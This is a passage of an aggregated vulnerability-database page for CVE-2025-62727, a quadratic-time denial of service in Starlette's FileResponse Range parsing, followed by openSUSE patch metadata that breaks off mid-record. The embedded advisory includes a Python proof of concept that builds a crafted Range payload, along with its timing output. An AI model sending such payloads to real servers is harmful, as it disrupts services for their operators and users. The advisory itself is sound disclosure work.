CVE-2025-62727 (GCVE-0-2025-62727)

Vulnerability from cvelistv5

Published

2025-10-28 20:14

Modified

2025-11-04 17:41

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-407 - Inefficient Algorithmic Complexity

Summary

Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.

References

URL

Tags

	security-advisories@github.com	https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5
	security-advisories@github.com	https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c
	security-advisories@github.com	https://github.com/Kludex/starlette/releases/tag/0.49.1
	security-advisories@github.com	https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8

Impacted products

	Vendor	Product	Version
	Kludex	starlette	Version: >= 0.39.0, < 0.49.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-62727",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-28T20:36:34.130234Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-28T20:36:49.189Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "starlette",
          "vendor": "Kludex",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.39.0, \u003c 0.49.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-407",
              "description": "CWE-407: Inefficient Algorithmic Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-11-04T17:41:42.316Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
        },
        {
          "name": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
        },
        {
          "name": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c"
        },
        {
          "name": "https://github.com/Kludex/starlette/releases/tag/0.49.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Kludex/starlette/releases/tag/0.49.1"
        }
      ],
      "source": {
        "advisory": "GHSA-7f5h-v6xp-fcq8",
        "discovery": "UNKNOWN"
      },
      "title": "Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-62727",
    "datePublished": "2025-10-28T20:14:53.655Z",
    "dateReserved": "2025-10-20T19:41:22.742Z",
    "dateUpdated": "2025-11-04T17:41:42.316Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-62727\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-28T21:15:40.447\",\"lastModified\":\"2025-11-04T18:16:45.480\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-407\"}]}],\"references\":[{\"url\":\"https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/releases/tag/0.49.1\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-62727\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-28T20:36:34.130234Z\"}}}], \"references\": [{\"url\": \"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-28T20:36:44.968Z\"}}], \"cna\": {\"title\": \"Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse\", \"source\": {\"advisory\": \"GHSA-7f5h-v6xp-fcq8\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"Kludex\", \"product\": \"starlette\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.39.0, \u003c 0.49.1\"}]}], \"references\": [{\"url\": \"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\", \"name\": \"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5\", \"name\": \"https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c\", \"name\": \"https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/Kludex/starlette/releases/tag/0.49.1\", \"name\": \"https://github.com/Kludex/starlette/releases/tag/0.49.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\\u2011of\\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-407\", \"description\": \"CWE-407: Inefficient Algorithmic Complexity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-04T17:41:42.316Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-62727\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-04T17:41:42.316Z\", \"dateReserved\": \"2025-10-20T19:41:22.742Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-28T20:14:53.655Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

ghsa-7f5h-v6xp-fcq8

Vulnerability from github

Published

2025-10-28 20:38

Modified

2025-11-04 17:40

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``

Details

Summary

An unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse).

Details

Starlette parses multi-range requests in FileResponse._parse_range_header(), then merges ranges using an O(n^2) algorithm.

```python

starlette/responses.py

_RANGE_PATTERN = re.compile(r"(\d)-(\d)") # vulnerable to O(n^2) complexity ReDoS

class FileResponse(Response): @staticmethod def parse_range_header(http_range: str, file_size: int) -> list[tuple[int, int]]: ranges: list[tuple[int, int]] = [] try: units, range = http_range.split("=", 1) except ValueError: raise MalformedRangeHeader()

    # [...]

    ranges = [
        (
            int(_[0]) if _[0] else file_size - int(_[1]),
            int(_[1]) + 1 if _[0] and _[1] and int(_[1]) < file_size else file_size,
        )
        for _ in _RANGE_PATTERN.findall(range_) # vulnerable
        if _ != ("", "")
    ]

```

The parsing loop of FileResponse._parse_range_header() uses the regular expression which vulnerable to denial of service for its O(n^2) complexity. A crafted Range header can maximize its complexity.

The merge loop processes each input range by scanning the entire result list, yielding quadratic behavior with many disjoint ranges. A crafted Range header with many small, non-overlapping ranges (or specially shaped numeric substrings) maximizes comparisons.

This affects any Starlette application that uses:

starlette.staticfiles.StaticFiles (internally returns FileResponse) — starlette/staticfiles.py:178
Direct starlette.responses.FileResponse responses

PoC

```python

!/usr/bin/env python3

import sys import time

try: import starlette from starlette.responses import FileResponse except Exception as e: print(f"[ERROR] Failed to import starlette: {e}") sys.exit(1)

def build_payload(length: int) -> str: """Build the Range header value body: '0' * num_zeros + '0-'""" return ("0" * length) + "a-"

def test(header: str, file_size: int) -> float: start = time.perf_counter() try: FileResponse._parse_range_header(header, file_size) except Exception: pass end = time.perf_counter() elapsed = end - start return elapsed

def run_once(num_zeros: int) -> None: range_body = build_payload(num_zeros) header = "bytes=" + range_body # Use a sufficiently large file_size so upper bounds default to file size file_size = max(len(range_body) + 10, 1_000_000)

print(f"[DEBUG] range_body length: {len(range_body)} bytes")
elapsed_time = test(header, file_size)
print(f"[DEBUG] elapsed time: {elapsed_time:.6f} seconds\n")

if name == "main": print(f"[INFO] Starlette Version: {starlette.version}") for n in [5000, 10000, 20000, 40000]: run_once(n)

""" $ python3 poc_dos_range.py [INFO] Starlette Version: 0.48.0 [DEBUG] range_body length: 5002 bytes [DEBUG] elapsed time: 0.053932 seconds

[DEBUG] range_body length: 10002 bytes [DEBUG] elapsed time: 0.209770 seconds

[DEBUG] range_body length: 20002 bytes [DEBUG] elapsed time: 0.885296 seconds

[DEBUG] range_body length: 40002 bytes [DEBUG] elapsed time: 3.238832 seconds """ ```

Impact

Any Starlette app serving files via FileResponse or StaticFiles; frameworks built on Starlette (e.g., FastAPI) are indirectly impacted when using file-serving endpoints. Unauthenticated remote attackers can exploit this via a single HTTP request with a crafted Range header.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.49.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "starlette"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.39.0"
            },
            {
              "fixed": "0.49.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62727"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-407"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-28T20:38:01Z",
    "nvd_published_at": "2025-10-28T21:15:40Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s `FileResponse` Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., `StaticFiles` or any use of `FileResponse`).\n\n### Details\nStarlette parses multi-range requests in ``FileResponse._parse_range_header()``, then merges ranges using an O(n^2) algorithm.\n\n```python\n# starlette/responses.py\n_RANGE_PATTERN = re.compile(r\"(\\d*)-(\\d*)\") # vulnerable to O(n^2) complexity ReDoS\n\nclass FileResponse(Response):\n    @staticmethod\n    def _parse_range_header(http_range: str, file_size: int) -\u003e list[tuple[int, int]]:\n        ranges: list[tuple[int, int]] = []\n        try:\n            units, range_ = http_range.split(\"=\", 1)\n        except ValueError:\n            raise MalformedRangeHeader()\n\n        # [...]\n\n        ranges = [\n            (\n                int(_[0]) if _[0] else file_size - int(_[1]),\n                int(_[1]) + 1 if _[0] and _[1] and int(_[1]) \u003c file_size else file_size,\n            )\n            for _ in _RANGE_PATTERN.findall(range_) # vulnerable\n            if _ != (\"\", \"\")\n        ]\n\n```\n\nThe parsing loop of ``FileResponse._parse_range_header()`` uses the regular expression which vulnerable to denial of service for its O(n^2) complexity. A crafted `Range` header can maximize its complexity.\n\nThe merge loop processes each input range by scanning the entire result list, yielding quadratic behavior with many disjoint ranges. A crafted Range header with many small, non-overlapping ranges (or specially shaped numeric substrings) maximizes comparisons.\n\n  This affects any Starlette application that uses:\n\n  - ``starlette.staticfiles.StaticFiles`` (internally returns `FileResponse`) \u2014 `starlette/staticfiles.py:178`\n  - Direct ``starlette.responses.FileResponse`` responses\n\n### PoC\n```python\n#!/usr/bin/env python3\n\nimport sys\nimport time\n\ntry:\n    import starlette\n    from starlette.responses import FileResponse\nexcept Exception as e:\n    print(f\"[ERROR] Failed to import starlette: {e}\")\n    sys.exit(1)\n\n\ndef build_payload(length: int) -\u003e str:\n    \"\"\"Build the Range header value body: \u00270\u0027 * num_zeros + \u00270-\u0027\"\"\"\n    return (\"0\" * length) + \"a-\"\n\n\ndef test(header: str, file_size: int) -\u003e float:\n    start = time.perf_counter()\n    try:\n        FileResponse._parse_range_header(header, file_size)\n    except Exception:\n        pass\n    end = time.perf_counter()\n    elapsed = end - start\n    return elapsed\n\n\ndef run_once(num_zeros: int) -\u003e None:\n    range_body = build_payload(num_zeros)\n    header = \"bytes=\" + range_body\n    # Use a sufficiently large file_size so upper bounds default to file size\n    file_size = max(len(range_body) + 10, 1_000_000)\n    \n    print(f\"[DEBUG] range_body length: {len(range_body)} bytes\")\n    elapsed_time = test(header, file_size)\n    print(f\"[DEBUG] elapsed time: {elapsed_time:.6f} seconds\\n\")\n\n\nif __name__ == \"__main__\":\n    print(f\"[INFO] Starlette Version: {starlette.__version__}\")\n    for n in [5000, 10000, 20000, 40000]:\n        run_once(n)\n\n\"\"\"\n$ python3 poc_dos_range.py\n[INFO] Starlette Version: 0.48.0\n[DEBUG] range_body length: 5002 bytes\n[DEBUG] elapsed time: 0.053932 seconds\n\n[DEBUG] range_body length: 10002 bytes\n[DEBUG] elapsed time: 0.209770 seconds\n\n[DEBUG] range_body length: 20002 bytes\n[DEBUG] elapsed time: 0.885296 seconds\n\n[DEBUG] range_body length: 40002 bytes\n[DEBUG] elapsed time: 3.238832 seconds\n\"\"\"\n```\n\n### Impact\nAny Starlette app serving files via FileResponse or StaticFiles; frameworks built on Starlette (e.g., FastAPI) are indirectly impacted when using file-serving endpoints. Unauthenticated remote attackers can exploit this via a single HTTP request with a crafted Range header.",
  "id": "GHSA-7f5h-v6xp-fcq8",
  "modified": "2025-11-04T17:40:59Z",
  "published": "2025-10-28T20:38:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Kludex/starlette"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kludex/starlette/releases/tag/0.49.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``"
}

opensuse-su-2025:15696-1

Vulnerability from csaf_opensuse

Published

2025-11-01 00:00

Modified

2025-11-01 00:00

Summary

python311-starlette-0.49.1-1.1 on GA media

Notes

Title of the patch

python311-starlette-0.49.1-1.1 on GA media

Description of the patch

These are all security issues fixed in the python311-starlette-0.49.1-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2025-15696

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python311-starlette-0.49.1-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python311-starlette-0.49.1-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-15696",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15696-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-62727 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-62727/"
      }
    ],
    "title": "python311-starlette-0.49.1-1.1 on GA media",
    "tracking": {
      "current_release_date": "2025-11-01T00:00:00Z",
      "generator": {
        "date": "2025-11-01T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:15696-1",
      "initial_release_date": "2025-11-01T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-11-01T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-starlette-0.49.1-1.1.aarch64",
                "product": {
                  "name": "python311-starlette-0.49.1-1.1.aarch64",
                  "product_id": "python311-starlette-0.49.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-starlette-0.49.1-1.1.aarch64",
                "product": {
                  "name": "python312-starlette-0.49.1-1.1.aarch64",
                  "product_id": "python312-starlette-0.49.1-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-starlette-0.49.1-1.1.aarch64",
                "product": {
                  "name": "python313-starlette-0.49.1-1.1.aarch64",
                  "product_id": "python313-starlette-0.49.1-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-starlette-0.49.1-1.1.ppc64le",
                "product": {
                  "name": "python311-starlette-0.49.1-1.1.ppc64le",
                  "product_id": "python311-starlette-0.49.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-starlette-0.49.1-1.1.ppc64le",
                "product": {
                  "name": "python312-starlette-0.49.1-1.1.ppc64le",
                  "product_id": "python312-starlette-0.49.1-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-starlette-0.49.1-1.1.ppc64le",
                "product": {
                  "name": "python313-starlette-0.49.1-1.1.ppc64le",
                  "product_id": "python313-starlette-0.49.1-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-starlette-0.49.1-1.1.s390x",
                "product": {
                  "name": "python311-starlette-0.49.1-1.1.s390x",
                  "product_id": "python311-starlette-0.49.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-starlette-0.49.1-1.1.s390x",
                "product": {
                  "name": "python312-starlette-0.49.1-1.1.s390x",
                  "product_id": "python312-starlette-0.49.1-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-starlette-0.49.1-1.1.s390x",
                "product": {
                  "name": "python313-starlette-0.49.1-1.1.s390x",
                  "product_id": "python313-starlette-0.49.1-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-starlette-0.49.1-1.1.x86_64",
                "product": {
                  "name": "python311-starlette-0.49.1-1.1.x86_64",
                  "product_id": "python311-starlette-0.49.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-starlette-0.49.1-1.1.x86_64",
                "product": {
                  "name": "python312-starlette-0.49.1-1.1.x86_64",
                  "product_id": "python312-starlette-0.49.1-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-starlette-0.49.1-1.1.x86_64",
                "product": {
                  "name": "python313-starlette-0.49.1-1.1.x86_64",
                  "product_id": "python313-starlette-0.49.1-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-starlette-0.49.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64"
        },
        "product_reference": "python311-starlette-0.49.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-starlette-0.49.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le"
        },
        "product_reference": "python311-starlette-0.49.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-starlette-0.49.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x"
        },
        "product_reference": "python311-starlette-0.49.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-starlette-0.49.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64"
        },
        "product_reference": "python311-starlette-0.49.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-starlette-0.49.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64"
        },
        "product_reference": "python312-starlette-0.49.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-starlette-0.49.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le"
        },
        "product_reference": "python312-starlette-0.49.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-starlette-0.49.1-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x"
        },
        "product_reference": "python312-starlette-0.49.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-starlette-0.49.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64"
        },
        "product_reference": "python312-starlette-0.49.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-starlette-0.49.1-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64"
        },
        "product_reference": "python313-starlette-0.49.1-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-starlette-0.49.1-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le"
        },
        "product_reference": "python313-starlette-0.49.1-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-starlette-0.49.1-1.1.s390x as component of openSUSE Tumbleweed",
